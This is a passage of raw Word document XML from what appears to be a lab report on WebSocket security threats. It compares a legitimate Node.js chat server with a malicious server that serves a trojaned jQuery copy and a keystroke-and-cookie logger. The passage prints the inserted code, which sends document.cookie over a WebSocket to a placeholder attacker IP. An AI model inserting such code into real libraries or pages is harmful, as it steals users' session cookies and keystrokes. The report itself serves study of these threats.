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CCECE" w14:textId="5EFAAEAC" w:rsidR="00786136" w:rsidRPr="00032376" w:rsidRDefault="00645BE7" w:rsidP="006938E2">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00032376">
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">Legitimate Server </w:t>
      </w:r>
      <w:r w:rsidR="006938E2" w:rsidRPr="00032376">
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Implementation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="520BE682" w14:textId="2D96E3E4" w:rsidR="00645BE7" w:rsidRPr="00032376" w:rsidRDefault="00645BE7" w:rsidP="006938E2">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="10B1736E" w14:textId="47FBDDD1" w:rsidR="00645BE7" w:rsidRPr="00032376" w:rsidRDefault="00645BE7" w:rsidP="006938E2">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00032376">
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
        </w:rPr>
        <w:tab/>
        <w:t>The legitimate server was implemented using nodejs</w:t>
      </w:r>
      <w:r w:rsidR="00580F41" w:rsidRPr="00032376">
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
        </w:rPr>
        <w:t>’</w:t>
      </w:r>
      <w:r w:rsidRPr="00032376">
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
        </w:rPr>
        <w:t xml:space="preserve"> express</w:t>
      </w:r>
      <w:r w:rsidR="00580F41" w:rsidRPr="00032376">
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
        </w:rPr>
        <w:t xml:space="preserve"> and websocket modules. The server listens on port 3000 and</w:t>
      </w:r>
      <w:r w:rsidR="00050DA9">
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00050DA9" w:rsidRPr="00032376">
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
        </w:rPr>
        <w:t>in response to get requests</w:t>
      </w:r>
      <w:r w:rsidR="00050DA9">
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00580F41" w:rsidRPr="00032376">
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00050DA9">
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
        </w:rPr>
        <w:t>renders</w:t>
      </w:r>
      <w:r w:rsidR="00580F41" w:rsidRPr="00032376">
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00050DA9">
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
        </w:rPr>
        <w:t xml:space="preserve">and serves </w:t>
      </w:r>
      <w:r w:rsidR="00202DB3" w:rsidRPr="00032376">
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r w:rsidR="00050DA9">
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
        </w:rPr>
        <w:t>n</w:t>
      </w:r>
      <w:r w:rsidR="00202DB3" w:rsidRPr="00032376">
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="005C3EA1" w:rsidRPr="00032376">
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
        </w:rPr>
        <w:t>HTML</w:t>
      </w:r>
      <w:r w:rsidR="00202DB3" w:rsidRPr="00032376">
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="005C3EA1" w:rsidRPr="00032376">
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
        </w:rPr>
        <w:t>p</w:t>
      </w:r>
      <w:r w:rsidR="00202DB3" w:rsidRPr="00032376">
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
        </w:rPr>
        <w:t>age</w:t>
      </w:r>
      <w:r w:rsidR="00050DA9">
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
        </w:rPr>
        <w:t xml:space="preserve"> from the file </w:t>
      </w:r>
      <w:r w:rsidR="00050DA9" w:rsidRPr="00050DA9">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:t>index.ejs</w:t>
      </w:r>
      <w:r w:rsidR="00202DB3" w:rsidRPr="00032376">
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="005C3EA1" w:rsidRPr="00032376">
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
        </w:rPr>
        <w:t xml:space="preserve">Once loaded in a browser the HTML page requests another JavaScript file that facilitates chat between multiple </w:t>
      </w:r>
      <w:r w:rsidR="00D66CED" w:rsidRPr="00032376">
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
        </w:rPr>
        <w:t xml:space="preserve">users with a WebSocket connection between each user and the legitimate server. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B9982D2" w14:textId="47690EAB" w:rsidR="00645BE7" w:rsidRPr="00032376" w:rsidRDefault="00D66CED" w:rsidP="006938E2">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00032376">
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="003A43E3" wp14:editId="67A4DEFF">
            <wp:extent cx="5958673" cy="3934253"/>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9131" cy="3954363"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EA09151" w14:textId="4830328A" w:rsidR="00D66CED" w:rsidRPr="00032376" w:rsidRDefault="00D66CED" w:rsidP="006938E2">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7C0FAF92" w14:textId="2406CCF4" w:rsidR="00D66CED" w:rsidRPr="00032376" w:rsidRDefault="00D66CED" w:rsidP="006938E2">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00032376">
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Malicious Server Implementation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33F17792" w14:textId="2DD6A65E" w:rsidR="00D66CED" w:rsidRPr="00032376" w:rsidRDefault="00D66CED" w:rsidP="006938E2">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1EB9256A" w14:textId="67C6570B" w:rsidR="00032376" w:rsidRPr="00032376" w:rsidRDefault="00032376" w:rsidP="006938E2">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00032376">
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
        </w:rPr>
        <w:t>Likewise, the malicious server was also implemented using nodejs’ express and websocket modules. The server preforms two functions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="676CEAAA" w14:textId="58736D46" w:rsidR="00032376" w:rsidRDefault="00032376" w:rsidP="00032376">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00032376">
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
        </w:rPr>
        <w:t xml:space="preserve">The server listens on port 5000 and makes available the files which are found in </w:t>
      </w:r>
      <w:r w:rsidRPr="00032376">
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00032376">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:t>…/Mal-Server/public</w:t>
      </w:r>
      <w:r w:rsidRPr="00032376">
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
        </w:rPr>
        <w:t xml:space="preserve"> This includes the file jqnc.js which is the uncompressed version of the jQuery library with the following code insertion:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77E1BE8C" w14:textId="77777777" w:rsidR="001047EE" w:rsidRDefault="001047EE" w:rsidP="00032376">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:after="0"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="75BD0E6F" w14:textId="77777777" w:rsidR="00D529A0" w:rsidRDefault="001047EE" w:rsidP="001047EE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:after="0"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001047EE">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:t>MalWS = new WebSocket('ws://</w:t>
      </w:r>
      <w:r w:rsidR="00D529A0">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidR="00D529A0" w:rsidRPr="00D529A0">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:i/>
        </w:rPr>
        <w:t>mal-server-IP</w:t>
      </w:r>
      <w:r w:rsidR="00D529A0">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
      <w:r w:rsidRPr="001047EE">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:t xml:space="preserve">:5001/', </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46FD255E" w14:textId="2CE203EB" w:rsidR="001047EE" w:rsidRPr="001047EE" w:rsidRDefault="001047EE" w:rsidP="001047EE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:after="0"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001047EE">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:t>'echo-protocol');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="788F6422" w14:textId="77777777" w:rsidR="001047EE" w:rsidRPr="001047EE" w:rsidRDefault="001047EE" w:rsidP="001047EE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:after="0"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001047EE">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:t>MalWS.onopen = function() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A15122D" w14:textId="77777777" w:rsidR="001047EE" w:rsidRPr="001047EE" w:rsidRDefault="001047EE" w:rsidP="001047EE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:after="0"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001047EE">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:tab/>
        <w:t>MalWS.send(JSON.stringify(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="692125EB" w14:textId="77777777" w:rsidR="001047EE" w:rsidRPr="001047EE" w:rsidRDefault="001047EE" w:rsidP="001047EE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:after="0"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001047EE">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">{protocol: 'cookieJQ', data: </w:t>
      </w:r>
      <w:r w:rsidRPr="001047EE">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:tab/>
        <w:t>document.cookie}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30015627" w14:textId="37B8959E" w:rsidR="001047EE" w:rsidRPr="001047EE" w:rsidRDefault="001047EE" w:rsidP="001047EE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:after="0"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001047EE">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:tab/>
        <w:t>));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="087F050B" w14:textId="0BCBF110" w:rsidR="001047EE" w:rsidRPr="001047EE" w:rsidRDefault="001047EE" w:rsidP="001047EE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:after="0"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001047EE">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:t>};</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29EB9DC0" w14:textId="77777777" w:rsidR="001047EE" w:rsidRPr="001047EE" w:rsidRDefault="001047EE" w:rsidP="001047EE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:after="0"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Consolas"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="50C05D2D" w14:textId="3D3C2DB9" w:rsidR="00545728" w:rsidRDefault="001047EE" w:rsidP="00032376">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:after="0"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Consolas"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001047EE">
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Consolas"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">This code will run </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Consolas"/>
        </w:rPr>
        <w:t>when an HTML</w:t>
      </w:r>
      <w:r w:rsidRPr="001047EE">
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Consolas"/>
        </w:rPr>
        <w:t xml:space="preserve"> page</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Consolas"/>
        </w:rPr>
        <w:t xml:space="preserve"> sets </w:t>
      </w:r>
      <w:r w:rsidR="00545728">
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Consolas"/>
        </w:rPr>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Consolas"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00545728" w:rsidRPr="00545728">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:t>src</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Consolas"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00545728">
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Consolas"/>
        </w:rPr>
        <w:t xml:space="preserve">attribute of its’ </w:t>
      </w:r>
      <w:r w:rsidR="00545728" w:rsidRPr="00545728">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:t>script</w:t>
      </w:r>
      <w:r w:rsidR="00545728">
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Consolas"/>
        </w:rPr>
        <w:t xml:space="preserve"> element to “</w:t>
      </w:r>
      <w:r w:rsidR="00545728" w:rsidRPr="00545728">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:t>http://[</w:t>
      </w:r>
      <w:r w:rsidR="00545728" w:rsidRPr="00545728">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:i/>
        </w:rPr>
        <w:t>malicious-server IP address</w:t>
      </w:r>
      <w:r w:rsidR="00545728" w:rsidRPr="00545728">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:t>]:5000/jqnc.js</w:t>
      </w:r>
      <w:r w:rsidR="00545728">
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Consolas"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Consolas"/>
        </w:rPr>
        <w:t xml:space="preserve">, opening a </w:t>
      </w:r>
      <w:r w:rsidR="00545728">
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Consolas"/>
        </w:rPr>
        <w:t>WebSocket</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Consolas"/>
        </w:rPr>
        <w:t xml:space="preserve"> connection to the malicious server and sending the page</w:t>
      </w:r>
      <w:r w:rsidR="00545728">
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Consolas"/>
        </w:rPr>
        <w:t>’</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Consolas"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidRPr="001047EE">
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Consolas"/>
        </w:rPr>
        <w:t xml:space="preserve"> cookies </w:t>
      </w:r>
      <w:r w:rsidR="00545728">
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Consolas"/>
        </w:rPr>
        <w:t>to the malicious server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27C20821" w14:textId="28452EB9" w:rsidR="00545728" w:rsidRPr="007C717E" w:rsidRDefault="00545728" w:rsidP="00032376">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:after="0"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007C717E">
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Consolas"/>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Note</w:t>
      </w:r>
      <w:r w:rsidR="007C717E" w:rsidRPr="007C717E">
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Consolas"/>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="007C717E">
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="007C717E" w:rsidRPr="007C717E">
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Although</w:t>
      </w:r>
      <w:r w:rsidRPr="007C717E">
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> it may be simpler to send the cookies as data with the HTTP POST method, this is a contrived example designed to test the security threats posed by WebSocket.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C1A6FB5" w14:textId="77777777" w:rsidR="007C717E" w:rsidRPr="001047EE" w:rsidRDefault="007C717E" w:rsidP="00032376">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:after="0"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Consolas"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F06301D" w14:textId="4001513F" w:rsidR="00032376" w:rsidRDefault="00032376" w:rsidP="00032376">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00545728">
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
        </w:rPr>
        <w:t xml:space="preserve">The Server hosts a WebSocket server on port 5001 that sends the file </w:t>
      </w:r>
      <w:r w:rsidR="0061435F" w:rsidRPr="0061435F">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:t>KeyCookieLog.js</w:t>
      </w:r>
      <w:r w:rsidR="0061435F">
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
        </w:rPr>
        <w:t xml:space="preserve"> to clients upon connection. This file records keystrokes and obtains the cookies of the page that made the connection and periodically sends them back to the WebSocket server on port 5001. The WebSocket server handles this incoming</w:t>
      </w:r>
      <w:r w:rsidR="00D529A0">
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
        </w:rPr>
        <w:t xml:space="preserve"> data, as well as the data incoming from the jQuery library insert from (1), and</w:t>
      </w:r>
      <w:r w:rsidR="0061435F">
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
        </w:rPr>
        <w:t xml:space="preserve"> records it in two texts files; </w:t>
      </w:r>
      <w:r w:rsidR="0061435F" w:rsidRPr="0061435F">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:t>cookieLog.txt</w:t>
      </w:r>
      <w:r w:rsidR="0061435F">
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidR="0061435F" w:rsidRPr="0061435F">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:t>keyLog.txt</w:t>
      </w:r>
      <w:r w:rsidR="0061435F">
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15AC9727" w14:textId="21649E2B" w:rsidR="0061435F" w:rsidRPr="0061435F" w:rsidRDefault="0061435F" w:rsidP="0061435F">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2C1490DE" w14:textId="3D376690" w:rsidR="0061435F" w:rsidRDefault="0061435F" w:rsidP="0061435F">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0061435F">
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Malicious Functionality:</w:t>
      </w:r>
    </w:p>
